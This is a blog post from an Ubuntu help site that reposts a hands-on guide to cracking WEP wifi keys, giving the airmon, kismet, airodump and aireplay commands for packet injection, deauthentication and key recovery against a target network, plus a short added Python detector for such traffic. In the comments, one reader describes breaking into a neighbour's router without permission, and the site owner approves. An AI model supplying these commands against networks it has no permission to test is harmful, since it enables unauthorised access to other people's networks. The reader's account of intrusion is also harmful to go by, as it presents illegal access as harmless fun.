Category: How to..., Installation, Linux Projects - Hands On — UbuntuLinuxHelp @ 10:47 am —

I was sent a great URL yesterday that (in essence) was a hands-on guide to cracking WEP. Personally I question the ethics of such activities; however, I’d also like to learn how this is done, so that I might further enhance the wifi security here. I’d like to adapt this to Feisty or Gutsy, so it will be interesting to see new versions and how they stack up against those in the guide. Below is the actual guide from the original author (listed below):

This post should enable anyone to get Linux up and running and crack a WEP key. It took me about 2 days and myriad tutorials to finally get this to work, and now that I have I feel that I should share it with everyone. I am by no means a Linux expert, but this works regardless. All you need is an old laptop with a wireless card and a copy of Ubuntu Linux, currently one of the most popular and easily installed distributions of Linux. If you haven’t already bought a wireless card, you should select one from this list to save yourself some trouble.

First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. This should be fairly straightforward and I’m not going to get into it any more than this. Once you have it installed and the layout and theme is how you want it, go on. But do everything in order, because otherwise it won’t really work.

Next step is to install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your box can connect to the internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

While in the editor, replace everything with:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

Save the file and exit the text editor. Next type the command:

sudo apt-get update

Now we have to install the packages we’ll need later on:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.

This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a Google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.

Let’s apply the madwifi patch, which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers off the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself.

sudo -i

cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name 'ath*' -exec rm -v {} \;
find /lib/modules -name 'wlan*' -exec rm -v {} \;

tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install

modprobe ath_pci

UPDATE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:

However, during Madwifi Installation I got this warning:

Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o

This warning can be IGNORED.

When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.

I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!

Karl, maybe you can add this to your tutorial cuz I did everything exactly as you wrote. Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricted-modules.

Thanks again!

Cheers,
mcgyver100

If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.

sudo gedit /etc/kismet/kismet.conf

Change the line that begins with 'source=' to 'source=madwifi_ag,ath0,madwifi'. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.

Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.

sudo airmon start ath0
sudo kismet

Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.

Next, run airodump.

sudo airodump ath0 filename channel# 1

The one at the end lets Airodump know we only want to capture IVs. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.

Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing 'sudo iwconfig ath0 rate 1M'.

Next we want to start injecting packets.

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:

sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets has been received, then open a new terminal window and run aircrack.

sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.

Published under a Creative Commons license by Karl Blitz

Update: Looking for compatible WiFi cards? Read here: http://ubuntulinuxhelp.com/how-to-setup-a-wireless-ubuntu-router/

Update:  The locations of some packages have changed! Please see the comments section below to find where the packages are. Thanks.
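
From the defender's side, the injection and deauthentication steps in the guide above show up as bursts of traffic that an access point owner can look for. The sketch below is an added example, not part of the original guide or of the aircrack tools: it counts frames per one-second window over constructed records. The record format, the frame length and both thresholds are assumptions chosen for illustration.

```python
from collections import Counter

# Constructed sample in the form "seconds,frame_type,source_mac,bssid,length".
# This is an assumed export format for the example, not real tool output.
def make_sample():
    lines = ["0.10,data,aa:bb:cc:00:00:01,aa:bb:cc:dd:ee:ff,1420",
             "0.40,data,aa:bb:cc:00:00:01,aa:bb:cc:dd:ee:ff,312",
             "0.90,deauth,aa:bb:cc:dd:ee:ff,aa:bb:cc:dd:ee:ff,26"]
    # Replay-style burst: one source repeats a same-sized frame hundreds of times.
    lines += [f"{1 + i * 0.002:.3f},data,00:01:02:03:04:05,aa:bb:cc:dd:ee:ff,68"
              for i in range(600)]
    # Deauthentication burst inside a single one-second window.
    lines += [f"{2.5 + i * 0.01:.2f},deauth,aa:bb:cc:dd:ee:ff,aa:bb:cc:dd:ee:ff,26"
              for i in range(40)]
    return lines

def detect(lines, window=1.0, replay_threshold=200, deauth_threshold=20):
    """Return sorted alerts as (kind, source_mac, window_start, count)."""
    same_size = Counter()  # (window index, source, length) -> data frames seen
    deauths = Counter()    # (window index, source) -> deauth frames seen
    for line in lines:
        ts, ftype, src, _bssid, length = line.strip().split(",")
        bucket = int(float(ts) // window)
        if ftype == "data":
            same_size[(bucket, src, int(length))] += 1
        elif ftype == "deauth":
            deauths[(bucket, src)] += 1
    alerts = []
    # Many identical-length data frames from one source in one window.
    for (bucket, src, _length), count in same_size.items():
        if count >= replay_threshold:
            alerts.append(("replay-burst", src, bucket * window, count))
    # Far more deauthentication frames than normal roaming produces.
    for (bucket, src), count in deauths.items():
        if count >= deauth_threshold:
            alerts.append(("deauth-burst", src, bucket * window, count))
    return sorted(alerts, key=lambda a: (a[2], a[0]))

if __name__ == "__main__":
    for alert in detect(make_sample()):
        print(alert)
```

Thresholds need tuning against normal traffic on the network being monitored; a busy client can legitimately send many same-sized frames.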

There are 21 comment(s) added so far...

#1

Would also be nice if there were a list of wifi cards that work with Ubuntu. Anyone have one?

JC256 wrote on February 26, 2008 - 11:28 am
#2
Roger wrote on February 26, 2008 - 11:32 am
#3
dAtriK wrote on February 26, 2008 - 11:55 am
#4

Also…

WiFi Radar Feisty:
http://packages.ubuntu.com/feisty/net/wifi-radar

WiFi Radar Gutsy:
http://packages.ubuntu.com/gutsy/net/wifi-radar

WiFi Radar Hardy:
http://packages.ubuntu.com/hardy/net/wifi-radar

I don’t see anything for Intrepid yet.

Roger wrote on February 26, 2008 - 12:29 pm
#5

[…] of the readers of another post “Using Ubuntu to Crack WEP“, sent me this […]

#6

thanks for posting this tutorial, im very new to ubuntu linux but i was keen to learn how to crack wepcodes. however i have encountered an issue. when i type the command

sudo mousepad /etc/kismet/kismet.conf

it opens mousepad, but the only text in the document says “warning, you are using the root account and this may harm your system”

so i cannot edit the file.
i have to use mousepad rather than Gedit because im running ubuntu on an eeepc and it runs much better.

i would be grateful for any help you could provide and i look forward to hearing back from you soon.

Sam

Sam wrote on March 29, 2008 - 4:10 am
#7

another issue that i have encountered is that neither of the links to the madwifi patches and packages work, could you provide more up to date links?

thanks again,

Sam

Sam wrote on March 29, 2008 - 4:17 am
#8

@Sam - Thanks for letting me know. :) The files are now here:

http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz

So…

Instead of:

madwifi-cvs-20051025.tar.gz
madwifi-cvs-20051025.patch

Use…

madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch

Roger wrote on March 29, 2008 - 8:08 am
#9

@Sam - The warning command tells you that you are operating with administrative rights and therefore can edit files with those administrative rights. If you make a mistake or edit something that can damage your installation, you will be able to do that… Because you are doing so with full administrative rights. You can use all sorts of editors like vi, nano, etc. It does not have to be gedit.

I have often broken my system doing such things, so please be careful that you don’t do anything to break yours. The guide was posted as a learning tool. Therefore do NOT use it to do anything ethically wrong or illegal. I used it to crack my own WEP code and to show people why they should use stronger encryption (like WPA, etc.) and not use WEP.

Roger wrote on March 29, 2008 - 8:15 am
#10

Could this guide be upgraded for Ubuntu 8.04 please? That repository isn’t available, and some programs are missing from the current ones…

Vadim P. wrote on May 7, 2008 - 8:10 am
#11

@Vadim P. - Are you able to tell me which ones are missing? I might be able to track them down. Also, if you happen to be looking for:

madwifi-ng-r1679-20060707.tar.gz
madwifi-ng-r1679.patch

They are here:

http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679.patch
http://ubuntulinuxhelp.com/wep/madwifi-ng-r1679-20060707.tar.gz

UbuntuLinuxHelp wrote on May 7, 2008 - 8:16 am
#12

I’m on some intel card, so I don’t think I need the wifi patch. Just want to see if my card can do this to begin with :)

The missing program is “airsnort”, which I think is responsible for airmon and airodump, and I can’t run those commands.

Vadim P. wrote on May 8, 2008 - 8:24 am
#13

@Vadim P. - Oh I see, okay, I will look later, but a quick link here: http://linux.softpedia.com/get/System/Monitoring/AirSnort-3454.shtml
Would compiling it help?
It has a quick blurb on that page about how to compile.
(I’ll look later anyway).
Thanks. :)

UbuntuLinuxHelp wrote on May 8, 2008 - 8:45 am
#14

[…] Among some of the features I think especially nice are backward compatibility with some of the command line tools (ifconfig for example), the ability to automatically connect at boot to accessible wifi networks and WPA support. As a side note… if some of you don’t think WPA is pertinent, please read: Don’t WEP Me! Ubuntu (and Others) Are Safer With WPA. or Using Ubuntu to Crack WEP. […]

#15

For people having trouble with these commands on Hardy, all the commands listed here that start with “air” are part of the aircrack-ng package. As for wifiradar, it’s actually called wifi-radar in the repos. I don’t know about madwifi, I didn’t need it.

Thanks for the tut, using this was loads of fun. I kept telling my neighbor who works a lot from home that WEP is insecure, but he’d rather take his stupid tech guy’s word that it can’t be broken by current technology (d’oh!) so I grabbed his WEP key, accessed his router config and changed the ESSID to “insecure network”. That scared him into changing his encryption to WPA-PSK :)
I guess it was an illegal invasion since I didn’t get his permission (or even warn him), but it was all for the greater good, and it was really fun. Obviously I didn’t do anything to hurt his files or exploit his network.

Gepetto wrote on June 16, 2008 - 11:54 am
#16

I must be doing something wrong, but I can’t see what it is. Even after one hour of running aireplay, airodump has still connected only 11 packets from my AP, and aireplay shows 0 ARP, 0 ACK and 0 packets sent. What gives?

Paulo wrote on June 16, 2008 - 5:01 pm
#17

@Paulo - Is that wireless card working properly? Are there any wireless networks in range?

UbuntuLinuxHelp wrote on June 18, 2008 - 6:55 am
#18

@Gepetto - Well… that’s one way to show someone the truth of the matter! :) For those who are interested in madwifi on Hardy (8.04), the info is here: https://help.ubuntu.com/community/WifiDocs/Driver/Madwifi#head-2a72fa3e31e1b7509b7b21bb1e2bdce8ee5ac782
I had fun playing too, so figured I’d post notes - That way I, or anyone, can come back later to refer to them.

UbuntuLinuxHelp wrote on June 18, 2008 - 7:03 am
#19

Thanks but I already figured out the problem. Turns out this method only works when there’s another client connected to the network. There’s a tutorial on aircrack-ng.org for obtaining a PRGA and cracking the network even without connected clients: http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients

It’s the same method with a few extra steps in the beginning. Worked like a charm.

Paulo wrote on June 18, 2008 - 11:45 am
#20

do you plan on updating this tutorial for hardy? please let me know

stephen wrote on June 28, 2008 - 11:28 am
#21

@stephen - I’d like to update it; maybe after the LAMP server series is finished. (Timing is a bit tight right now). If you have some input, feel free to let me know. ;) Thanks!

UbuntuLinuxHelp wrote on June 30, 2008 - 7:50 am